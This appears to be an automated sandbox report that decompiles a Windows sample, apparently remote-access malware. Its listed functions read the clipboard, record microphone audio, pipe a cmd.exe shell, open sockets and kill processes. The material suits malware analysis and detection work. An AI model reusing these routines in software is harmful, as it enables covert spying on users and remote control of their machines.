                                                                                • ??0out_of_range@std@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@1@@Z.MSVCP60(?,?,00404EDA,00000000,00000004,0041B310,?,?,?,0040E3FF,00000000), ref: 0040502B
                                                                                • _CxxThrowException.MSVCRT(?,00416F28), ref: 0040503A
                                                                                Strings
                                                                                • invalid vector<T> subscript, xrefs: 00405019
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$??0?$basic_string@??0out_of_range@std@@D@1@@D@2@@1@@D@2@@std@@ExceptionThrowV?$basic_string@
                                                                                • String ID: invalid vector<T> subscript
                                                                                • API String ID: 3609083747-3016609489
                                                                                • Opcode ID: f2318338d56b632758377919ba935548815a1a15df351b5bf930e86c92a347c4
                                                                                • Instruction ID: 9be96ab786121cdca3df7d0b72c820f15abd94e2066078dc6746ba185848b686
                                                                                • Opcode Fuzzy Hash: f2318338d56b632758377919ba935548815a1a15df351b5bf930e86c92a347c4
                                                                                • Instruction Fuzzy Hash: ADD0127181030FFBCF00FBE0DD49CEDB77CAA04709B100015B511A3054FA74A64E8B69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00412019, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 8libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00412019() {
				_Unknown_base(*)()* _t2;

				_t2 = GetProcAddress(LoadLibraryA("User32.dll"), "GetLastInputInfo");
				 *0x41c1dc = _t2;
				return _t2;
			}




                                                                                0x0041202f
                                                                                0x00412035
                                                                                0x0041203a

                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 00412028
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041202F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: GetLastInputInfo$User32.dll
                                                                                • API String ID: 2574300362-1519888992
                                                                                • Opcode ID: 309a20106e4e73e8368ae1d4b5b3144523e47d6202d84086a94c943d5948cba1
                                                                                • Instruction ID: 4254d4a464572d01fe3095e43ecaf4df99145fa2531fe7b32d94017085124a09
                                                                                • Opcode Fuzzy Hash: 309a20106e4e73e8368ae1d4b5b3144523e47d6202d84086a94c943d5948cba1
                                                                                • Instruction Fuzzy Hash: F2C09B709D0650FB86011FA0AD1DBD83B15664B745721C933B902F5251CBB8D080EF1D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040F4AE, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 8libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0040F4AE() {
				_Unknown_base(*)()* _t2;

				_t2 = GetProcAddress(GetModuleHandleA("User32.dll"), "GetCursorInfo");
				 *0x41bf1c = _t2;
				return _t2;
			}




                                                                                0x0040f4c4
                                                                                0x0040f4ca
                                                                                0x0040f4cf

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040F4BD
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040F4C4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProc
                                                                                • String ID: GetCursorInfo$User32.dll
                                                                                • API String ID: 1646373207-2714051624
                                                                                • Opcode ID: 4448927a859271910f0b75d11c3b5b646031b719c8466c7563d1e3f86e814f60
                                                                                • Instruction ID: c5b485f27e89021cea1a89f12a6954dfd40793fe5a01e249b662889bc5cfc0be
                                                                                • Opcode Fuzzy Hash: 4448927a859271910f0b75d11c3b5b646031b719c8466c7563d1e3f86e814f60
                                                                                • Instruction Fuzzy Hash: F0C04C75551600A686005FA1BC0D6D53A14A956745711C436B802B1255CB7C41459E5D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00413AED, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 8libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00413AED() {
				_Unknown_base(*)()* _t2;

				_t2 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GetConsoleWindow");
				 *0x41c1f8 = _t2;
				return _t2;
			}




                                                                                0x00413b03
                                                                                0x00413b09
                                                                                0x00413b0e

                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow), ref: 00413AFC
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00413B03
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: GetConsoleWindow$kernel32.dll
                                                                                • API String ID: 2574300362-100875112
                                                                                • Opcode ID: 9955e51fb7636a0590f3210687e67071c6be7c6c5ddc6a030eb57b0b1f68f6e2
                                                                                • Instruction ID: 6ee53b0f0035eccf7fe7e145557d43f0b39688fed8dbf49153f7f93891f0b47b
                                                                                • Opcode Fuzzy Hash: 9955e51fb7636a0590f3210687e67071c6be7c6c5ddc6a030eb57b0b1f68f6e2
                                                                                • Instruction Fuzzy Hash: 83C09BB4AD1611FB86015FA0BC4EAC87B145A46707332C077781191255DA7880C45A1D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040B615, Relevance: 6.1, APIs: 4, Instructions: 57registryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 79%
                                                                                			E0040B615(void* __ecx, intOrPtr _a4, void* _a8, short* _a12, char _a15) {
				int _v8;
				int _v12;
				char* _t31;
				signed int _t36;
				signed int _t37;
				void* _t46;

				_v8 = 0;
				_t31 = 0x415664;
				if(RegQueryValueExW(_a8, _a12, 0,  &_v12, 0,  &_v8) == 0 && _v8 > 0) {
					_t31 = malloc(_v8);
					_t36 = _v8;
					_t46 = _t31;
					_t37 = _t36 >> 2;
					memset(_t46 + _t37, memset(_t46, 0, _t37 << 2), (_t36 & 0x00000003) << 0);
					RegQueryValueExW(_a8, _a12, 0,  &_v12, _t31,  &_v8);
				}
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t31,  &_a15);
				return _a4;
			}









                                                                                0x0040b62f
                                                                                0x0040b635
                                                                                0x0040b641
                                                                                0x0040b652
                                                                                0x0040b654
                                                                                0x0040b65b
                                                                                0x0040b65d
                                                                                0x0040b667
                                                                                0x0040b67a
                                                                                0x0040b67a
                                                                                0x0040b684
                                                                                0x0040b691

                                                                                APIs
                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0040B63D
                                                                                • malloc.MSVCRT ref: 0040B64B
                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0040B67A
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415664,?), ref: 0040B684
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: QueryV?$allocator@Value$??0?$basic_string@G@1@@G@2@@std@@G@std@@U?$char_traits@malloc
                                                                                • String ID:
                                                                                • API String ID: 3506253819-0
                                                                                • Opcode ID: 334642ca9c5921904f617564a68cf70a4dc2ee16bb16387c8e9b5fee4fcdd566
                                                                                • Instruction ID: 6657ce7e0b4af722a3644f787a918a8cc9d20f3304ca96b666d2b0068cb46159
                                                                                • Opcode Fuzzy Hash: 334642ca9c5921904f617564a68cf70a4dc2ee16bb16387c8e9b5fee4fcdd566
                                                                                • Instruction Fuzzy Hash: 3E11097260010DFFDB05DF95DD80DEFBBBDEB88250B10406ABA05D6250D7719E149BA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004028CD, Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 004028DC
                                                                                  • Part of subcall function 00402038: #23.WS2_32(00000000,00000001,00000006,0041BCB0,0040C8BF), ref: 00402053
                                                                                  • Part of subcall function 0040209B: #4.WS2_32(0041BE70,0041BE74,00000010,?,0041B320,?,0040CA5C), ref: 004020B1
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00402915
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00402928
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0040295E,00000001,00000073), ref: 00402953
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$V01@@$??0?$basic_string@$??1?$basic_string@??4?$basic_string@V01@
                                                                                • String ID:
                                                                                • API String ID: 3852086675-0
                                                                                • Opcode ID: 83aad247175ce399ea9e14f93eae6aa15783594a462698d047ee4c7974368ae1
                                                                                • Instruction ID: 3575325012e9a6a69ab12c81105f5cb7c7dcd4fb264b21d23710b3ab9203063c
                                                                                • Opcode Fuzzy Hash: 83aad247175ce399ea9e14f93eae6aa15783594a462698d047ee4c7974368ae1
                                                                                • Instruction Fuzzy Hash: 0301B97170030867DB00BB76DE4D6EE3A5DDBC5350F40803ABE169B2D1CBB9894483D9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00401181, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 58%
                                                                                			E00401181(void* __eflags, signed int _a4) {
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t19;
				intOrPtr _t22;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				intOrPtr _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				signed int _t36;

				_t38 = __eflags;
				E0040180C(0x41b200, __eflags, _a4);
				__imp__?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z( *0x41b1d4);
				_t36 = _a4 << 5;
				_t16 = E0040180C(0x41b200, _t38, _a4);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t28 =  *0x41b1dc; // 0x0
				 *((intOrPtr*)(_t36 + _t28)) = _t16;
				_t17 =  *0x41b1dc; // 0x0
				_t29 =  *0x41b1d4; // 0x0
				 *((intOrPtr*)(_t36 + _t17 + 4)) = _t29;
				_t30 =  *0x41b1dc; // 0x0
				 *((intOrPtr*)(_t36 + _t30 + 8)) = 0;
				_t31 =  *0x41b1dc; // 0x0
				 *((intOrPtr*)(_t36 + _t31 + 0xc)) = 0;
				_t32 =  *0x41b1dc; // 0x0
				 *((intOrPtr*)(_t36 + _t32 + 0x10)) = 0;
				_t33 =  *0x41b1dc; // 0x0
				 *((intOrPtr*)(_t36 + _t33 + 0x14)) = 0;
				_t19 =  *0x41b1dc; // 0x0
				waveInPrepareHeader( *0x41b198, _t19 + _t36, 0x20);
				_t22 =  *0x41b1dc; // 0x0
				return waveInAddBuffer( *0x41b198, _t36 + _t22, 0x20);
			}














                                                                                0x00401181
                                                                                0x00401196
                                                                                0x0040119d
                                                                                0x004011ab
                                                                                0x004011ae
                                                                                0x004011b5
                                                                                0x004011bb
                                                                                0x004011c3
                                                                                0x004011c6
                                                                                0x004011cb
                                                                                0x004011d1
                                                                                0x004011d5
                                                                                0x004011dd
                                                                                0x004011e1
                                                                                0x004011e7
                                                                                0x004011eb
                                                                                0x004011f1
                                                                                0x004011f5
                                                                                0x004011fb
                                                                                0x004011ff
                                                                                0x0040120d
                                                                                0x00401213
                                                                                0x0040122c

                                                                                APIs
                                                                                • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60(?,00000000,?,?,0040116A,00000000), ref: 0040119D
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,0040116A,00000000), ref: 004011B5
                                                                                • waveInPrepareHeader.WINMM(00000000,00000020,?,?,0040116A,00000000), ref: 0040120D
                                                                                • waveInAddBuffer.WINMM(?,00000020,?,?,0040116A,00000000), ref: 00401223
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@wave$?c_str@?$basic_string@?resize@?$basic_string@BufferHeaderPrepare
                                                                                • String ID:
                                                                                • API String ID: 1952094867-0
                                                                                • Opcode ID: 24a45407b9a895f56b61697f3f12604cdeae615d42fa41337b1c513b769c6b25
                                                                                • Instruction ID: 8f998c45a3acb3b0b10d37a494ac82bd1c86fe74dd73c150e7a1b96005ae6754
                                                                                • Opcode Fuzzy Hash: 24a45407b9a895f56b61697f3f12604cdeae615d42fa41337b1c513b769c6b25
                                                                                • Instruction Fuzzy Hash: 83111835600644FFCB159F65EC689E67BE6EB89394702C83DED0A87365DB31A801CBD8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00412B4A, Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • OpenProcess.KERNEL32(00000410,00000000,00409B39,000197E8), ref: 00412B5E
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00412B89
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00412B9A
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 00412BAE
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseHandleV?$allocator@$??0?$basic_string@G@1@@G@2@@std@@G@std@@OpenProcessU?$char_traits@
                                                                                • String ID:
                                                                                • API String ID: 284624841-0
                                                                                • Opcode ID: 022d2fd6006c4be54da2a4328dbb8e4cfe22859691548aaa1e3c37b3e0e1552c
                                                                                • Instruction ID: ad3219438425194a21685df614a361962293db7adaf2229f34b8827cc35eabff
                                                                                • Opcode Fuzzy Hash: 022d2fd6006c4be54da2a4328dbb8e4cfe22859691548aaa1e3c37b3e0e1552c
                                                                                • Instruction Fuzzy Hash: 40F0A435644519FBDB119F50DD48FDA376CEB04701F008162F90ADA151DBB0FA418B99
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040B5A2, Relevance: 6.0, APIs: 4, Instructions: 37registryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 18%
                                                                                			E0040B5A2(intOrPtr _a4, void* _a8, short* _a12, char _a15, short* _a16) {
				int _v8;
				char _v2056;

				_v8 = 0x400;
				if(RegOpenKeyExW(_a8, _a12, 0, 0x20019,  &_a8) != 0) {
					_push( &_a15);
					_push(0x415800);
				} else {
					RegQueryValueExW(_a8, _a16, 0, 0,  &_v2056,  &_v8);
					RegCloseKey(_a8);
					_push( &_a15);
					_push( &_v2056);
				}
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z();
				return _a4;
			}





                                                                                0x0040b5ae
                                                                                0x0040b5cb
                                                                                0x0040b601
                                                                                0x0040b602
                                                                                0x0040b5cd
                                                                                0x0040b5e2
                                                                                0x0040b5eb
                                                                                0x0040b5f4
                                                                                0x0040b5fb
                                                                                0x0040b5fb
                                                                                0x0040b60a
                                                                                0x0040b614

                                                                                APIs
                                                                                • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,80000000), ref: 0040B5C3
                                                                                • RegQueryValueExW.ADVAPI32(80000000,00412203,00000000,00000000,?,00000400), ref: 0040B5E2
                                                                                • RegCloseKey.ADVAPI32(80000000), ref: 0040B5EB
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415800,?), ref: 0040B60A
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$??0?$basic_string@CloseG@1@@G@2@@std@@G@std@@OpenQueryU?$char_traits@Value
                                                                                • String ID:
                                                                                • API String ID: 4081865614-0
                                                                                • Opcode ID: fb7ef9b6539aba75acc45a89fbd2bb87bc1b0fcb06b4154e7f789d8a22b8fd0a
                                                                                • Instruction ID: 08c4fdd74f089b672de4800a8e1209c34edbbd410ac70e3f0c9e675f1f7a205c
                                                                                • Opcode Fuzzy Hash: fb7ef9b6539aba75acc45a89fbd2bb87bc1b0fcb06b4154e7f789d8a22b8fd0a
                                                                                • Instruction Fuzzy Hash: 3D01F67554010EFFDB11DF90ED45FDA7BBCFB08304F508062BA05AA1A0D770AA199B98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040D87E, Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 37%
                                                                                			E0040D87E() {
				char _t9;
				void* _t22;
				void* _t28;
				intOrPtr _t29;

				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(E0040180C(_t22 - 0x10, _t28, 1));
				_t29 =  *0x41b889; // 0x0
				if(_t29 == 0) {
					_t9 = E0040180C(_t22 - 0x10, _t29, 0);
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
					E00402B8A(_t9);
				}
				E004017DD(_t22 - 0x10);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}







                                                                                0x0040d88e
                                                                                0x0040d896
                                                                                0x0040d89c
                                                                                0x0040d8a6
                                                                                0x0040d8b1
                                                                                0x0040d8b7
                                                                                0x0040e597
                                                                                0x0040e6a4
                                                                                0x0040e6ac
                                                                                0x0040e6b5
                                                                                0x0040e6c1

                                                                                APIs
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000001), ref: 0040D88E
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040D8B1
                                                                                  • Part of subcall function 00402B8A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00402BDC
                                                                                  • Part of subcall function 00402B8A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00402BFB
                                                                                  • Part of subcall function 00402B8A: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B860,cmd.exe), ref: 00402C1F
                                                                                  • Part of subcall function 00402B8A: getenv.MSVCRT ref: 00402C34
                                                                                  • Part of subcall function 00402B8A: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00402C3E
                                                                                  • Part of subcall function 00402B8A: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415774), ref: 00402C4B
                                                                                  • Part of subcall function 00402B8A: CreatePipe.KERNEL32(0041B7A0,0041B870,0041B7F0,00000000), ref: 00402C81
                                                                                  • Part of subcall function 00402B8A: CreatePipe.KERNEL32(0041B858,0041B874,0041B7F0,00000000), ref: 00402C9B
                                                                                  • Part of subcall function 00402B8A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0041B7A8,0041B878), ref: 00402CF2
                                                                                  • Part of subcall function 00402B8A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000001,00000000,00000000,00000000), ref: 00402D06
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E6AC
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@V01@$??1?$basic_string@??4?$basic_string@?c_str@?$basic_string@CreateD@1@@PipeV01@@$??8std@@D@2@@0@V?$basic_string@Y?$basic_string@getenv
                                                                                • String ID:
                                                                                • API String ID: 187635395-0
                                                                                • Opcode ID: 3d5a2c9a913f0a26f94001448af1abd8968a4c9c09541a6a69092f469a409126
                                                                                • Instruction ID: 95a58a3f9309c0e5762bae13ef1d8417c4b6d23d487987f94e594afc93633c1a
                                                                                • Opcode Fuzzy Hash: 3d5a2c9a913f0a26f94001448af1abd8968a4c9c09541a6a69092f469a409126
                                                                                • Instruction Fuzzy Hash: 22F03A7191011CCBD704BBA6ECA99EE7B34EB64355B404C3BE412A20E1EBB90525CA5D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00406BEF, Relevance: 6.0, APIs: 4, Instructions: 27clipboardCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 27%
                                                                                			E00406BEF(void* __ecx, intOrPtr _a4) {
				char _v5;
				void* _t15;

				if(OpenClipboard(0) == 0) {
					L3:
					_push( &_v5);
					_push(0x415664);
				} else {
					_t15 = GetClipboardData(1);
					CloseClipboard();
					if(_t15 == 0) {
						goto L3;
					} else {
						_push( &_v5);
						_push(_t15);
					}
				}
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
				return _a4;
			}





                                                                                0x00406bfe
                                                                                0x00406c1b
                                                                                0x00406c1e
                                                                                0x00406c1f
                                                                                0x00406c00
                                                                                0x00406c08
                                                                                0x00406c0a
                                                                                0x00406c12
                                                                                0x00000000
                                                                                0x00406c14
                                                                                0x00406c17
                                                                                0x00406c18
                                                                                0x00406c18
                                                                                0x00406c12
                                                                                0x00406c27
                                                                                0x00406c32

                                                                                APIs
                                                                                • OpenClipboard.USER32(00000000), ref: 00406BF6
                                                                                • GetClipboardData.USER32 ref: 00406C02
                                                                                • CloseClipboard.USER32(?,00406C77,?,?,00000000,00000000,?,?,?,?,?,00405AF6), ref: 00406C0A
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?,?,00406C77,?,?,00000000,00000000,?,?,?,?,?,00405AF6), ref: 00406C27
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Clipboard$V?$allocator@$??0?$basic_string@CloseD@1@@D@2@@std@@D@std@@DataOpenU?$char_traits@
                                                                                • String ID:
                                                                                • API String ID: 1727351239-0
                                                                                • Opcode ID: d31ff5e3c6f90f495a0499d15105459c1e1ba467a64aad7b936036200359d4d3
                                                                                • Instruction ID: d068d5d9f876e73b388ef04ee2f39e673df6a44b067aa838ba22f5a803aba3f5
                                                                                • Opcode Fuzzy Hash: d31ff5e3c6f90f495a0499d15105459c1e1ba467a64aad7b936036200359d4d3
                                                                                • Instruction Fuzzy Hash: 05E03075504615EFE7409B50DC49FDA7BACDB85B52F408035B90ADA280D7749980CAA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004054E9, Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 004054FC
                                                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 0040550F
                                                                                • SetEvent.KERNEL32(?,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405518
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405527
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$V01@V01@@Y?$basic_string@$??1?$basic_string@Event
                                                                                • String ID:
                                                                                • API String ID: 3911305588-0
                                                                                • Opcode ID: 5e8272a8b6e28889ab6d8654449965f19fbf5b6a96bc948a22fd1af30fd28282
                                                                                • Instruction ID: de7088bd0e13ff88ad3ed09bf1a5158b73f18205d37a60fa436fa72f9884fc0a
                                                                                • Opcode Fuzzy Hash: 5e8272a8b6e28889ab6d8654449965f19fbf5b6a96bc948a22fd1af30fd28282
                                                                                • Instruction Fuzzy Hash: 06F08231400B49EFCB11DF60D848AD77FA8EF05244F448469E48382961D774F588CF98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040D7C0, Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 46%
                                                                                			E0040D7C0(void* __eflags) {
				char* _t5;
				void* _t20;

				_t5 = E0040180C(_t20 - 0x10, __eflags, 0);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				E004126BC(atoi(_t5));
				E004017DD(_t20 - 0x10);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}





                                                                                0x0040d7c5
                                                                                0x0040d7cc
                                                                                0x0040d7da
                                                                                0x0040e6a4
                                                                                0x0040e6ac
                                                                                0x0040e6b5
                                                                                0x0040e6c1

                                                                                APIs
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040D7CC
                                                                                • atoi.MSVCRT ref: 0040D7D3
                                                                                  • Part of subcall function 004126BC: OpenProcess.KERNEL32(00000001,00000000,?), ref: 004126C9
                                                                                  • Part of subcall function 004126BC: TerminateProcess.KERNEL32(00000000,00000000), ref: 004126D7
